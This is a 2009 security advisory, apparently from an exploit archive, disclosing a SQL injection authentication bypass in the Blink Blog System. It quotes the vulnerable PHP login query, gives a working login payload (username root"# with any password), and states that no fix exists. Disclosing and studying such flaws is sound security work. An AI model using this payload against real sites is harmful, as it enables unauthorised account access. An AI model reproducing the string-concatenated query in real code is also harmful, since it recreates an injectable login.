Blink Blog System (Auth Bypass) SQL Injection Vulnerability

2009-08-03 21:07:45

******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs

There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

...

$username = $_POST["nick"];
$password = md5($_POST["password"]);
if ($data = $DB->usercheck($username, $password))

...

db.php:

function usercheck($username, $password)
{
$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");

...


***************************************************

[+] Code


- [A] Authentication Bypass

username: root"#
password: foo


***************************************************

[+] Fix

No fix.


***************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.